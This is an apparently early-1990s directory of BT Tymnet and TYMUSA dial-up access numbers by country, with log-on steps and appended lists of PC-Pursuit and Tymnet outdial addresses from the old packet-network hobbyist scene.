Note: When dialing inter-country to Belgium, all phone numbers are preceded by dialing (32).
————————————————————
DENMARK
————————————————————
Copenhagen E2 31-18-63-33 300/1200/2400/mnp

Note: When dialing inter-country to Copenhagen, the phone number is preceded by dialing (45).

————————————————————
FRANCE
————————————————————
Paris E1 (1) 46-02-57-50 300/1200/2400
E1 (1) 46-02-55-00 1200/2400/mnp
E1 (1) 47-71-91-33 1200
E1 (1) 46-02-70-03 300/1200/2400/mnp
Lyon E1 (7) 89-30-17-3 300/1200/2400/mnp

Note: When dialing inter-country to France, all phone numbers are preceded by dialing (33). For BT Tymnet’s support center in Paris call: 1-49-11-21-21

————————————————————
ITALY
————————————————————
Milan E2 (2) 26-41-24-50 1200/2400

Note: When dialing inter-country to Italy, the phone number is preceded by (39).
————————————————————
JAPAN (NIS)
————————————————————
Akita * (188) 655735 300B
Akita * (188) 655733 1200B
Akita * (188) 655734 1200B/2400
Atsugi * (462) 215331 300B
Atsugi * (462) 210404 1200B/2400
Fukui * (776) 343308 300B
Fukui * (776) 358840 1200B/2400
Fukuoka * (92) 474-7076 300B
Fukuoka * (92) 474-7196 1200B/2400
Hamamatsu * (534) 567355 300B
Hamanatsu * (534) 567231 1200B/2400
Hiroshima * (82) 241-6857 300B
Hiroshima * (82) 243-9270 1200B/2400
Kagoshima * (992) 228598 300B
Kagoshima * (992) 228954 1200B
Kagoshima * (992) 229154 1200B/2400
Kanazawa * (762) 242351 300B
Kanazawa * (762) 242341 1200B/2400
Kohbe * (78) 242-1097 300B
Kohbe * (78) 242-1115 1200B/2400
Kumamoto * (96) 355-5233 300B
Kumamoto * (96) 354-3065 1200B/2400
Kyoto * (75) 431-6205 300B
Kyoto * (75) 431-6203 1200B/2400
Matsuyama * (899) 322975 300B
Matsuyama * (899) 324207 1200B/2400
Mito * (292) 241675 300B
Mito * (292) 244213 1200B/2400
Morioka * (196) 548513 300B
Morioka * (196) 547315 1200B/2400
Nagagsaki * (958) 286088 300B
Nagagsaki * (958) 286077 1200B/2400
Nagoya * (52) 204-2275 300B
Nagoya * (52) 204-1466 1200B/2400
Naha * (988) 614002 300B
Naha * (988) 613414 1200B/2400
Niigata * (25) 241-5409 300B
Niigata * (25) 241-5410 1200B/2400
Okayama * (862) 326760 300B
Okayama * (862) 314993 1200B/2400
Osaka * (6) 271-9028 300B
Osaka * (6) 271-9029 1200B
Osaka * (6) 271-6876 1200B/2400
Sapporo * (11) 281-4343 300B
Sapporo * (11) 281-4421 1200B/2400
Sendai * (22) 231-5741 300B
Sendai * (22) 231-5355 1200B/2400
Shizuoka * (542) 843393 300B
Shizuoka * (542) 843398 1200B/2400
Takamatsu * (878) 230502 300B
Takamatsu * (878) 230501 1200B/2400
Tokyo * (3) 555-9525 300B
Tokyo * (3) 555-9526 1200B
Tokyo * (3) 555-9696 2400
Toyama * (764) 417578 300B
Toyama * (764) 417769 1200B/2400
Tuchiura * (298) 555082 300B
Tuchiura * (298) 556121 1200B/2400
Urawa * (488) 339341 1200B/2400
Yokohama * (45) 453-7757 300B
Yokohama * (45) 453-7637 1200B/2400
For NIS customer service in Japan 24 hours a day call: (3) 551-6220
Interdialing precede with dialing (81).
————————————————————
NETHERLANDS
————————————————————
Alkmaar E1 (72) 155190 300/1200/2400/mnp
Amsterdam E1 (20) 6610094 300/1200/1200-75
2400/9600/mnp
Eindhoven E1 (4902) 45530 300/1200/2400/mnp
The Hague E1 (70) 3814641 1200
E1 (70) 3475032 300/1200/2400/mnp
(70) 3818448 4800/9600/mnp
Rotterdam E1 (10)4532002 300/1200/1200-75
2400/9600mnp
Note: When dialing inter-country to the Netherlands, all phone numbers are preceded by dialing (31). For BT Tymnet’s support center in the Netherlands call: (70) 3820044
————————————————————
SWEDEN
————————————————————
Stockholm E2 (8) 29-4782 300/1200/2400/mnp

Note: When dialing inter-country to the Stockholm, the phone number is preceded by dialing (46). For BT Tymnet’s support center in Sweden call: (8) 98-8140
————————————————————
SWITZERLAND
————————————————————
Geneva E1 (22) 782-9329 300/1200/2400
Zurich E1 (1) 730-9673 1200/2400

Note: When dialing inter-country to Switzerland, all phone
numbers are preceded by dialing (41). For BT Tymnet’s support center in Switzerland call: (22) 782-5040
————————————————————
UNITED KINGDOM
————————————————————
Belfast E1 (232) 234467
Birmingham E1 (21) 632 6636
Bristol E1 (272) 255392
Cambridge E1 (223) 845860
Edinburgh E1 (31) 313 2172
Leeds E1 (532) 341838
London E1 (81) 566 7260
London E1 (71) 489 8571

Note: The preceeding United Kingdom access numbers are scheduled to be available early August 1990. Please consult GNS customer support at 703/442-0145 or BT Tymnet’s support center in London at (582) 482 592 for more information.
Note: When dialing inter-country to the United Kingdom, all
phone numbers are preceded by dialing (44). The above access numbers will support 300-2400 V22 bis and MNP 4.
————————————————————
GERMANY
————————————————————
Cologne E1 (221)210196 300/1200/2400
Frankfurt E1 (69)666-8131 1200
E1 (69)668011 300
E1 (69)666-4021 300/1200
Munich E1 (89)350-7682 300/1200/2400
Note: When dialing inter-country to West Germany, all phone
numbers are preceded by dialing (49). For BT Tymnet’s
support center in West Germany call: (21) 159-6314

TYMUSA
Quick, easy access from around the world; a universal, simple and familiar log-on procedure (see below).
All communication charges are billed to the host in the USA by BT Tymnet.
TYMUSA is offered on BT Tymnet in country nodes, PTT’s nodes using TYMNET technology (via a `T2′ Gateway) and PTT’s nodes using non-TYMNET technology (via a X.75 Gateway).
On dial-access location using non-TYMNET technology, the service is referred to as TYMLINK. Log-on may vary to that of TYMUSA; however, all other features are the same. Variations in log-on are highlighted.
TYMUSA is offered in all BT Tymnet GNS countries at charge rate Band 1.

TYMUSA ACCESS COUNTRIES
COUNTRY
Access
City Band Number Comments
————————————————————
ANTIGUA
————————————————————
All Cities 3 809/462-0210 300B/1200B

Note: When dialing inter-country to Antigua, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
ARGENTINA
————————————————————
Buenos Aires 2 (1) 40-01-91 300
2 (1) 40-01-92 300
2 (1) 40-01-93 300
2 (1) 40-01-94 300
2 (1) 40-01-95 300
2 (1) 40-01-96 300
2 (1) 40-01-97 300
2 (1) 40-01-98 300
2 (1) 40-01-99 300

Note: When dialing inter-country to Argentina, all phone numbers are preceded by dialing (54).

COUNTRY
Access
City Band Number Comments
————————————————————
AUSTRIA
————————————————————
Vienna 2 (222) 50124 300
Vienna 2 (222) 50143 1200/2400
Outside Vienna 2 229015 1200/2400
2 229016 300/1200
2 229017 1200/2400

Note : Log-on “…” (cr) then TYMUSA log-on procedure. For additional log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Argentina, all phone numbers are preceded by dialing (43).
————————————————————
BAHAMAS
————————————————————
All Cities 3 809/323-7799 300B/1200B/2400

Note: When dialing inter-country to the Bahamas, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
BAHRAIN
————————————————————
All Cities 3 242525 300
3 245361 1200
Note: When dialing inter-country to Bahrain, all phone numbers are preceded by dialing (973).
————————————————————
BARBADOS
————————————————————
All Cities 3 809/426-7760 300B/1200B
Note: When dialing inter-country to Barbardos, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
BERMUDA
————————————————————
All Cities 2 809/292-4327 300B/1200B
Note: When dialing inter-country to Bermuda, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
CAYMAN ISLANDS
————————————————————
All Cities 3 809/949-7100 300B/1200B

Note: When dialing inter-country to the Cayman Islands, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
DOMINICAN REPUBLIC
————————————————————
All Cities 3 809/685-6155 300B/1200B

Note: Use domestic log-on procedure.
Note: When dialing inter-country to the Dominican Republic, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
GUAM
————————————————————
Agana Heights * 477-2222 300/1200

Note: When dialing inter-country to Guam, the phone number is preceded by dialing (671).

————————————————————
GUATEMALA
————————————————————
Guatemala City 2 (2) 345-599 300B
2 (2) 345-999 1200B

Note: When dialing inter-country to Guatemala, all phone numbers are preceded by dialing (502).
————————————————————
HONDURAS
————————————————————
All Cities 2 320-544 300B/1200B

Note: When dialing inter-country to Honduras, the phone number is preceded by dialing (504).
————————————————————
HONG KONG
————————————————————
Hong Kong 2 865-7414 300B/1200B/2400
Note: Use domestic log-on procedure.
Note: When dialing inter-country to Hong Kong, the phone number is preceded by dialing (852).
————————————————————
ISRAEL
————————————————————
Afula 3 (6) 596658 300B/1200B/2400
Ashdod 3 (8) 542999 300B/1200B/2400
Bezeq 3 (57) 36029 300B/1200B/2400
Eilat 3 (59) 75147 300B/1200B/2400
Hadera 3 (6) 332409 300B/1200B/2400
Haifa 3 (4) 525421 300B/1200B/2400
3 (4) 673235 300B/1200B/2400
3 (4) 674203 300B/1200B/2400
3 (4) 674230 300B/1200B/2400
Herzeliya 3 (52) 545251 300B/1200B/2400
Jerusalem 3 (2) 242675 300B/1200B/2400
3 (2) 246363 300B/1200B/2400
3 (2) 248551 300B/1200B/2400
3 (2) 814396 300B/1200B/2400
Nahariya 3 (4) 825393 300B/1200B/2400
Netanya 3 (53) 348588 300B/1200B/2400
Rechovot 3 (8) 469799 300B/1200B/2400
Tel Aviv 3 (3) 203435 300B/1200B/2400
3 (3) 546-3837 300B/1200B/2400
3 (3) 751-2504 300B/1200B/2400
3 (3) 751-3799 300B/1200B/2400
3 (3) 752-0110 300B/1200B/2400
Tiberias 3 (6) 790274 300B/1200B/2400
Tzfat 3 (6) 973282 300B/1200B/2400

Note: For log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Israel, all phone numbers are preceded by dialing (972).
————————————————————
JAMAICA
————————————————————
All Cities 2 809/924-9915 300B/1200B

Note: When dialing inter-country to Jamaica, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
KOREA
————————————————————
Seoul 3 (2) 792-1455 1200

Note: Use domestic log-on procedure.
Note: When dialing inter-country to Korea, all phone numbers are preceded by dialing (82).

————————————————————
NETHERLANDS ANTILLES
————————————————————
Curacao 3 (9) 239251 300/1200
Curacao/St. Maarten 3 (Local Only) 0251 300/1200
Note: When dialing inter-country to Netherland Antilles, the phone numbers is preceded by dialing (599).
Note: The Curacao/St. Maarten access location is a local access location only. This location can not be used for inter-city or inter-country access.
————————————————————
PANAMA
————————————————————
All Cities 3 639-055 300B/1200B
3 636-727 2400

Note: When dialing inter-country to Panama, all phone numbers are preceded by dialing (507).
————————————————————
PERU
————————————————————
Lima 4 (14) 240-478 1200

Note: When dialing inter-country to Peru, all phone numbers are preceded by dialing (51).
————————————————————
PUERTO RICO
————————————————————
Mayaquez/Ponce * 809/462-4213 300B/1200B
San Juan * 809/725-1882 300B/1200B
* 809/725-4343 300B/1200B
* 809/725-3501 300/1200
* 809/725-4702 300/1200
* 809/724-6070 2400
————————————————————
PHILIPPINES
————————————————————
Manila 2 (2) 819-1011 300
2 (2) 819-1009 300
2 (2) 819-1550 300
2 (2) 815-1553 300B/1200B
2 (2) 815-1555 300B/1200B
2 (2) 817-1791 300B/1200B
2 (2) 817-1581 300B/1200B
2 (2) 817-1796 300B/1200B
2 (2) 817-8811 300
2 (2) 521-7901 300

Note: When dialing inter-country to the Philippines, all phone numbers are preceded by dialing (63).
————————————————————
SAUDI ARABIA
————————————————————
Riyadh 5 (1) 4658803 1200
5 (1) 4631038 2400
Jeddah 5 (2) 6690708 1200
5 (2) 6691377 2400
Alkobar 5 (3) 8981025 1200

Note: For log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Saudi Arabia, all phone
numbers are preceded by dialing (966).
————————————————————
TRINIDAD & TOBAGO
————————————————————
All Cities 2 809/627-0854 300/1200
2 809/627-0855 300/1200

Note: When dialing inter-country to Trinidad and Tobago, all phone numbers are preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
UNITED KINGDOM (British Telecom PSS)
————————————————————
Aberdeen 1 (224) 210701
Belfast 1 (232) 331284
Birmingham 1 (21) 633-3474
Bristol 1 (272) 211545
Cambridge 1 (223) 460127
Cardiff 1 (222) 344184
Chelmsford 1 (245) 491323
Edinburgh 1 (31) 313-2137
Exeter 1 (392) 421565
Glasgow 1 (41) 204-1722
Hastings 1 (424) 722788
Ipswich 1 (473) 210212
Kings Lynn 1 (553) 691090
Leamington 1 (926) 451419
Leeds 1 (532) 440024
Liverpool 1 (51) 255-0230
London 1 (71) 490-2200
Luton 1 (582) 481818
Manchester 1 (61) 834-5533
Newcastle 1 (91) 261-6858
Northhampton 1 (604) 33395
Nottingham 1 (602) 506005
Oxford 1 (865) 798949
Plymouth 1 (752) 603302
Reading 1 (734) 500722
Southampton 1 (703) 634530

Note: When dialing inter-country to the United Kingdom, all phone number are preceded by dialing (44). The above access
numbers will support 300/1200/2400 bps.
The above numbers support
————————————————————
VIRGIN ISLANDS (U.S.)
————————————————————
St. Thomas 3 809/774-7099 300B
3 809/776-7084 1200B
————————————————————
TYMUSA Access Procedures
The following log-on procedures pertain to the countries listed on the previous pages:
First, dial up the access number provided for the specific country from the preceeding list.
When you have established a network connection you will receive the following network prompt:
Please log in:

After the prompt, type the following:
Please log in: TYMUSA

This will establish the link to TYMNET. You will then receive another prompt from TYMNET at which time you should enter your username as in the example below:
Please log in: YOURUSERNAME
COUNTRIES WITH ACCESS TO AND FROM TYMNET
————————————-
Brazil, Chile,China, Costa Rica, Curacao,
Finland , French Antilles,French Guiana ,
Gabon, Gambia, Hungary, Iceland ,Indonesia,
Iraq ,Ivory Coast, Liechtenstein,
Malaysia, Mexico, New Caledonia,New Zealand,
Norway, Portugal, Qatar,South Africa,
Thailand ,Turkey , United Arab Emirates,
USSR, Zimbabwe.
——————————————————-
GALAXY INFORMATION NETWORK
Albuquerque, New Mexico
Contact: Customer Service 1 (505) 881-6988 (Voice)
1 (505) 881-6964 (Data)
——————————————————–
STARLINK
Albuquerque, New Mexico

Contact: Customer Service 1 (505) 881-6988 (Voice)
1 (505) 881-6964 (Data)
————————————————————

PC-Pursuit OutDials Originally Compiled By Ixom
+-New Jersey——————-+ +-Wisconsin——————–+
| 03110 201 00 001 1200 Baud | | 03110 414 00 020 300 Baud |
| 03110 201 00 022 2400 Baud | | 03110 414 00 021 1200 Baud |
| 03110 201 00 301 1200 Baud | | 03110 414 00 120 ???? Baud |
+-District of Columbia———+ +-California——————-+
| 03110 202 00 115 300 Baud | | 03110 415 00 005 2400 Baud |
| 03110 202 00 116 1200 Baud | | 03110 415 00 011 1200 Baud |
| 03110 202 00 117 2400 Baud | | 03110 415 00 023 ???? Baud |
+-Connecticut——————+ | 03110 415 00 108 300 Baud |
| 03110 203 00 105 2400 Baud | | 03110 415 00 109 1200 Baud |
| 03110 203 00 120 1200 Baud | | 03110 415 00 215 300 Baud |
| 03110 203 00 121 300 Baud | | 03110 415 00 216 1200 Baud |
+-Washington——————-+ | 03110 415 00 217 2400 Baud |
| 03110 206 00 205 300 Baud | | 03110 415 00 224 2400 Baud |
| 03110 206 00 206 1200 Baud | +-Oregon———————–+
| 03110 206 00 208 2400 Baud | | 03110 503 00 020 300 Baud |
+-New York———————+ | 03110 503 00 021 1200 Baud |
| 03110 212 00 028 2400 Baud | +-Arizona———————-+
| 03110 212 00 315 1200 Baud | | 03110 602 00 022 300 Baud |
+-California——————-+ | 03110 602 00 023 1200 Baud |
| 03110 213 00 023 ???? Baud | | 03110 602 00 026 2400 Baud |
| 03110 213 00 103 1200 Baud | +-Minnesota——————–+
| 03110 213 00 412 1200 Baud | | 03110 612 00 022 2400 Baud |
| 03110 213 00 413 2400 Baud | | 03110 612 00 120 300 Baud |
+-Texas————————+ | 03110 612 00 121 1200 Baud |
| 03110 214 00 022 ???? Baud | +-Massachussetts—————+
| 03110 214 00 117 300 Baud | | 03110 617 00 026 ???? Baud |
| 03110 214 00 118 1200 Baud | | 03110 617 00 311 300 Baud |
+-Pennsylvania—————–+ | 03110 617 00 313 1200 Baud |
| 03110 215 00 005 300 Baud | +-Texas————————+
| 03110 215 00 022 2400 Baud | | 03110 713 00 024 2400 Baud |
| 03110 215 00 112 1200 Baud | | 03110 713 00 113 300 Baud |
+-Ohio————————-+ | 03110 713 00 114 1200 Baud |
| 03110 216 00 020 300 Baud | +-California——————-+
| 03110 216 00 021 1200 Baud | | 03110 714 00 004 2400 Baud |
| 03110 216 00 120 2400 Baud | | 03110 714 00 023 300 Baud |
+-Colorado———————+ | 03110 714 00 024 1200 Baud |
| 03110 303 00 021 1200 Baud | | 03110 714 00 102 2400 Baud |
| 03110 303 00 114 300 Baud | | 03110 714 00 119 300 Baud |
| 03110 303 00 115 2400 Baud | | 03110 714 00 121 1200 Baud |
+-Florida———————-+ | 03110 714 00 210 300 Baud |
| 03110 305 00 120 300 Baud | | 03110 714 00 213 1200 Baud |
| 03110 305 00 121 1200 Baud | +-Utah————————-+
| 03110 305 00 122 2400 Baud | | 03110 801 00 012 2400 Baud |
+-Illinois———————+ | 03110 801 00 020 300 Baud |
| 03110 312 00 024 2400 Baud | | 03110 801 00 021 1200 Baud |
| 03110 312 00 410 300 Baud | +-Florida———————-+
| 03110 312 00 411 1200 Baud | | 03110 813 00 020 300 Baud |
+-Michigan———————+ | 03110 813 00 021 1200 Baud |
| 03110 313 00 024 2400 Baud | | 03110 813 00 124 2400 Baud |
| 03110 313 00 214 300 Baud | +-Missouri———————+
| 03110 313 00 216 1200 Baud | | 03110 816 00 104 300 Baud |
+-Missouri———————+ | 03110 816 00 113 1200 Baud |
| 03110 314 00 005 2400 Baud | +-California——————-+
| 03110 314 00 020 1200 Baud | | 03110 818 00 021 1200 Baud |
+-Alabama———————-+ +-California——————-+
| 03110 404 00 022 2400 Baud | | 03110 916 00 007 2400 Baud |
| 03110 404 00 113 300 Baud | | 03110 916 00 011 300 Baud |
| 03110 404 00 114 1200 Baud | | 03110 916 00 012 1200 Baud |
+-California——————-+ +-North Carolina—————+
| 03110 408 00 021 2400 Baud | | 03110 919 00 020 300 Baud |
| 03110 408 00 110 300 Baud | | 03110 919 00 021 1200 Baud |
| 03110 408 00 111 1200 Baud | | 03110 919 00 124 2400 Baud |
+——————————+ +——————————+

Other telenet outdials
311020600017, 311020600019, 311020600021, 311021200316,
311031400421, 311071400124, 311081600221

+-TymNet OutDials Sorted By Area Code–+——————————-Page 1-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|201 NJ 03106 00 6319 Englewood Cliffs |507 MN 03106 00 1059 Rochester |
|201 NJ 03106 00 7618 Newark |508 MA 03106 00 1014 Groton |
|201 NJ 03106 00 2312 Paterson |508 MA 03106 00 1067 Leomister |
|201 NJ 03106 00 3319 Pascataway |508 MA 03106 00 531 Lowell |
|201 NJ 03106 00 6334 Red Bank |508 MA 03106 00 4001 Manchester |
|201 NJ 03106 00 4378 Union City |508 MA 03106 00 432 Marlborough |
|203 CT 03106 00 9128 Bloomfield |508 MA 03106 00 3520 Taunton |
|203 CT 03106 00 6472 Bridgeport |508 MA 03106 00 3456 Worcester |
|203 CT 03106 00 9128 Hartford |509 WA 03106 00 5298 Pullman |
|203 CT 03106 00 9126 New Haven |509 WA 03106 00 2116 Richland |
|203 CT 03106 00 7955 New London |509 WA 03106 00 8931 Yakima |
|203 CT 03106 00 9126 North Haven |512 TX 03106 00 1306 Austin |
|203 CT 03106 00 8071 Somers |512 TX 03106 00 424 Corpus Christi |
|203 CT 03106 00 9129 Stamford |512 TX 03106 00 2565 Lubbock |
|203 CT 03106 00 7962 Westport| |512 TX 03106 00 9169 San Antonio |
|205 AL 03106 00 4101 Birmingham |512 TX 03106 00 1099 Texarkana |
|205 AL 03106 00 5641 Florence |513 OH 03106 00 1785 Cincinnata |
|205 AL 03106 00 8287 Gadsden |513 OH 03106 00 9511 Dayton |
|205 AL 03106 00 1258 Huntsville |516 NY 03106 00 582 Centereach |
|205 AL 03106 00 8829 Mobile |516 NY 03106 00 9193 Hempstead |
|205 AL 03106 00 3245 Montgomery |516 NY 03106 00 582 Lake Grove |
|205 AL 03106 00 2439 Northport |516 NY 03106 00 8811 Melville |
|205 AL 03106 00 1751 Opelika |517 MI 03106 00 4766 Freeland |
|205 AL 03106 00 2439 Tuscaloosa |517 MI 03106 00 9992 Lansing |
|206 WA 03106 00 1827 Auburn |517 MI 03106 00 4766 Midland |
|206 WA 03106 00 9170 Bellevue |518 NY 03106 00 9198 Albany |
|206 WA 03106 00 2745 Bellingham |601 MS 03106 00 1953 Gulfport |
|206 WA 03106 00 773 Bremerton |601 MS 03106 00 1164 Hattiesburg |
|206 WA 03106 00 2944 Longview |601 MS 03106 00 6301 Jackson |
|206 WA 03106 00 6113 Port Angeles |601 MS 03106 00 8598 Pascagoula |
|206 WA 03106 00 9170 Seattle |601 MS 03106 00 9901 Tupelo |
|206 WA 03106 00 159 Spokane |601 MS 03106 00 4405 Vicksburg |
|206 WA 03106 00 906 Tacoma |602 AZ 03106 00 6112 Flagstaff |
|206 WA 03106 00 5447 Vancouver |602 AZ 03106 00 9532 Mesa |
|207 ME 03106 00 4217 Portland |602 AZ 03106 00 9532 Phoenix |
|208 ID 03106 00 200 Boise |602 AZ 03106 00 4751 Tucson |
|208 ID 03106 00 1023 Ceour D’Alene |602 AZ 03106 00 3530 Yuma |
|208 ID 03106 00 3660 Idaho Falls |603 NH 03106 00 4027 Manchester |
|208 ID 03106 00 5151 Twin Falls |603 NH 03106 00 1347 Nashua |
|209 CA 03106 00 3996 Fresno |603 NH 03106 00 1696 North Hampton |
|209 CA 03106 00 8629 Merced |603 NH 03106 00 1554 Peterborough |
|209 CA 03106 00 2120 Modesto |603 NH 03106 00 6651 Portsmouth |
|209 CA 03106 00 3598 Visalia |606 KY 03106 00 9987 Lexington |
|212 NY 03106 00 1059 New York |607 NY 03106 00 5312 Binghampton |
|213 CA 03106 00 9203 El Segundo |608 WI 03106 00 5314 Beloit |
|213 CA 03106 00 3173 Inglewood |608 WI 03106 00 4200 Madison |
|213 CA 03106 00 9205 Long Beach |609 NJ 03106 00 5425 Atlantic City |
|214 TX 03106 00 2948 Dallas |609 NJ 03106 00 8693 Camden |
|214 TX 03106 00 8254 McKinney |609 NJ 03106 00 8693 Pennsauken |
|214 TX 03106 00 6248 Sherman |609 NJ 03106 00 8920 Princeton |
|214 TX 03106 00 8871 Texarkana |609 NJ 03106 00 8920 South Brunswick |
|215 PA 03106 00 3432 Bethlehem |609 NJ 03106 00 730 Trenton |
|215 PA 03106 00 7057 Coatesville |609 NJ 03106 00 3847 Vineland |
|215 PA 03106 00 508 Norristown |612 MN 03106 00 3494 Minneapolis |
|215 PA 03106 00 9581 Philadelphia |612 MN 03106 00 3494 St. Paul |
|216 OH 03106 00 8740 Akron |612 MN 03106 00 8335 St. Cloud |
|216 OH 03106 00 8160 Canton |614 OH 03106 00 9347 Columbus |
|216 OH 03106 00 4222 Cleveland |615 TN 03106 00 2937 Chattanooga| |
|216 OH 03106 00 8859 Elyria |615 TN 03106 00 5720 Clarkesville |
|216 OH 03106 00 3180 Warren |615 TN 03106 00 9985 Knoxville |
|216 OH 03106 00 4909 Youngstown |615 TN 03106 00 9141 Nashville |
+————————————–+————————————–+

+-TymNet OutDials Sorted By Area Code–+——————————-Page 2-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|217 IL 03106 00 1119 Danville |615 TN 03106 00 9683 Oakridge |
|217 IL 03106 00 8900 Decatur |615 TN 03106 00 9114 Sevierville |
|217 IL 03106 00 5403 Springfield |616 MI 03106 00 1014 Battle Creek |
|217 IL 03106 00 9753 Urbana |616 MI 03106 00 4231 Benton Harbor |
|218 MN 03106 00 1093 Duluth |616 MI 03106 00 4017 Grand Rapids |
|219 IN 03106 00 2444 Elkhart |616 MI 03106 00 3195 Kalamazoo |
|219 IN 03106 00 3423 Ft.Wayne |616 MI 03106 00 4357 Muskegon |
|219 IN 03106 00 2705 Gary |617 MA 03106 00 7044 Bedford |
|219 IN 03106 00 5129 South Bend |617 MA 03106 00 8796 Boston |
|301 MD 03106 00 1058 Annapolis |617 MA 03106 00 8796 Cambridge |
|301 MD 03106 00 4600 Baltimore |617 MA 03106 00 1067 Kingston |
|301 MD 03106 00 999 Cumberland |618 IL 03106 00 8910 East St. Louis |
|301 MD 03106 00 1083 Myersville |618 IL 03106 00 3001 O’Fallon |
|301 MD 03106 00 552 Rockville |619 CA 03106 00 7859 Cathredal City |
|301 MD 03106 00 1020 Salisbury |619 CA 03106 00 7859 Palm Springs |
|302 DE 03106 00 7789 Dover |619 CA 03106 00 5416 Poway |
|302 DE 03106 00 1080 Georgetown |619 CA 03106 00 9183 San Diego |
|302 DE 03106 00 1784 Newark |619 CA 03106 00 4304 Vista |
|302 DE 03106 00 1784 Willmington |702 NV 03106 00 342 Boulder City |
|303 CO 03106 00 2584 Aurora |702 NV 03106 00 2140 Carson City |
|303 CO 03106 00 2584 Boulder |702 NV 03106 00 342 Las Vegas |
|303 CO 03106 00 2584 Denver |702 NV 03106 00 2140 Reno |
|303 CO 03106 00 8737 Fort Collins |703 VA 03106 00 2262 Alexandria |
|303 CO 03106 00 6115 Grand Junction |703 VA 03106 00 2262 Arlington |
|303 CO 03106 00 7743 Greeley |703 VA 03106 00 2262 Fairfax |
|304 WV 03106 00 3431 Charleston |703 VA 03106 00 1014 Harrisonburg |
|304 WV 03106 00 1430 Huntington |703 VA 03106 00 4026 Roanoke |
|305 FL 03106 00 7123 Fort Lauderdale |704 NC 03106 00 0271 Asheville |
|305 FL 03106 00 7096 Longwood |704 NC 03106 00 6793 Charlotte |
|305 FL 03106 00 6582 Miami |704 NC 03106 00 7821 Kannapolis |
|305 FL 03106 00 7096 Orlando |707 CA 03106 00 4952 Fairfield |
|308 NE 03106 00 6997 Grand Island |707 CA 03106 00 1911 Moorpark |
|309 IL 03106 00 1149 Bloomington |707 CA 03106 00 4111 Santa Rosa |
|309 IL 03106 00 3614 Peoria| |707 CA 03106 00 3830 Vallejo |
|309 IL 03106 00 5296 Rock Isl|and |708 IL 03106 00 1094 Northfield |
|312 IL 03106 00 8257 Chicago |708 IL 03106 00 7005 Palatine |
|312 IL 03106 00 8944 Glen Ellyn |713 TX 03106 00 7758 Baytown |
|312 IL 03106 00 780 Lake Bluff |713 TX 03106 00 4562 Houston |
|313 MI 03106 00 209 Ann Arbor |714 CA 03106 00 9184 Anaheim |
|313 MI 03106 00 894 Burton |714 CA 03106 00 6294 Colton |
|313 MI 03106 00 8794 Detroit |714 CA 03106 00 4309 Diamond Bar |
|313 MI 03106 00 894 Flint |714 CA 03106 00 9184 Newport Beach |
|313 MI 03106 00 4847 Plymouth |714 CA 03106 00 6294 Riverside |
|313 MI 03106 00 4620 Port Huron |714 CA 03106 00 4447 San Clemente |
|313 MI 03106 00 3948 Southfield |714 CA 03106 00 5970 Upland |
|314 MO 03106 00 8978 Bridgeton |716 NY 03106 00 9194 Buffalo |
|314 MO 03106 00 6017 Columbia |716 NY 03106 00 6019 Pittsford |
|314 MO 03106 00 6182 Rolla |716 NY 03106 00 6019 Rochester |
|314 MO 03106 00 8978 St. Louis |717 PA 03106 00 7853 Lancaster |
|315 NY 03106 00 4710 Syracuse |717 PA 03106 00 1707 Lemoyne |
|315 NY 03106 00 1101 Utica |717 PA 03106 00 1572 Scranton |
|316 KS 03106 00 8013 Wichita |717 PA 03106 00 7941 Wilkes-Barre |
|317 IN 03106 00 9349 Indianapolis |719 CO 03106 00 2660 Denver |
|317 IN 03106 00 2646 Kokomo |801 UT 03106 00 801 Salt Lake City |
|317 IN 03106 00 4632 Marion |803 SC 03106 00 9907 Charleston |
|317 IN 03106 00 5032 Muncie |803 SC 03106 00 9993 Columbia |
|318 LA 03106 00 8525 Lafayette |803 SC 03106 00 9074 Greenville |
|318 LA 03106 00 4233 Lake Charles |803 SC 03106 00 9912 Myrtle Beach |
|401 RI 03106 00 9130 Providence |804 VA 03106 00 8215 Hampton |
|402 NE 03106 00 9856 Lincoln |804 VA 03106 00 2839 Lynchburg |
|402 NE 03106 00 2521 Omaha |804 VA 03106 00 7339 Midlothian |
+————————————–+————————————–+

+-TymNet OutDials Sorted By Area Code–+——————————-Page 3-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|404 GA 03106 00 4829 Athens |804 VA 03106 00 8459 Newport News |
|404 GA 03106 00 8795 Atlanta |804 VA 03106 00 6986 Norfolk |
|404 GA 03106 00 4752 Columbus |804 VA 03106 00 1931 Petersburg |
|404 GA 03106 00 8795 Doraville |804 VA 03106 00 6986 Portsmouth |
|404 GA 03106 00 8795 Marietta |804 VA 03106 00 413 Richmond |
|404 GA 03106 00 0433 Martinez |804 VA 03106 00 4557 Williamsburg |
|404 GA 03106 00 8795 Norcross |805 CA 03106 00 3664 Bakersfield |
|404 GA 03106 00 1386 Rome |805 CA 03106 00 5991 Lancaster |
|405 OK 03106 00 1081 Enid |805 CA 03106 00 6116 Los Alamos |
|405 OK 03106 00 9165 Oklahoma City |805 CA 03106 00 5134 Moorpark |
|406 MT 03106 00 3740 Great Falls |805 CA 03106 00 4112 Port Hueneme |
|406 MT 03106 00 3504 Billings |805 CA 03106 00 2979 San Luis Obispo |
|407 FL 03106 00 5656 Boca Raton |805 CA 03106 00 6295 Santa Barbera |
|407 FL 03106 00 3720 Cocoa |805 CA 03106 00 6116 Santa Maria |
|407 FL 03106 00 5656 Delray Beach |806 TX 03106 00 8736 Amarillo |
|407 FL 03106 00 4701 Fort Pierce |806 TX 03106 00 4435 Lubbock |
|407 FL 03106 00 9900 Kissimmee |812 IN 03106 00 9323 Bloomington |
|407 FL 03106 00 9902 Port St. Lucie |812 IN 03106 00 3426 Evansville |
